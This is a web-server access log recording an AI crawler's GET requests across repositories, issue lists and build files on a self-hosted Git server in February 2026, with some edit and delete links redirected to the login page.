AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:18:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11278] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:18:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:18:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13362] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=closed&type=all" -[17/Feb/2026:18:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10097] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=open&type=all" -[17/Feb/2026:18:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=open&type=all" -[17/Feb/2026:18:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11412] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:18:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:18:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:18:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19507] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11762] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 13020] [Gzip 6.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/storage.py?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:18:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py?display=source" [Client 74.7.227.38] [Length 13367] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:18:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9961] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" -[17/Feb/2026:18:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10122] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" -[17/Feb/2026:18:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?files=.TemporaryDocument%2f%ed%95%84%ec%9a%94%20Linux%eb%aa%85%eb%a0%b9%eb%93%a4%20%eb%aa%a8%ec%9d%8c.md" [Client 74.7.227.38] [Length 17195] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 20120] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:18:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12407] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" -[17/Feb/2026:18:01:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:02:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10681] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:18:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10131] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13146] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.05] 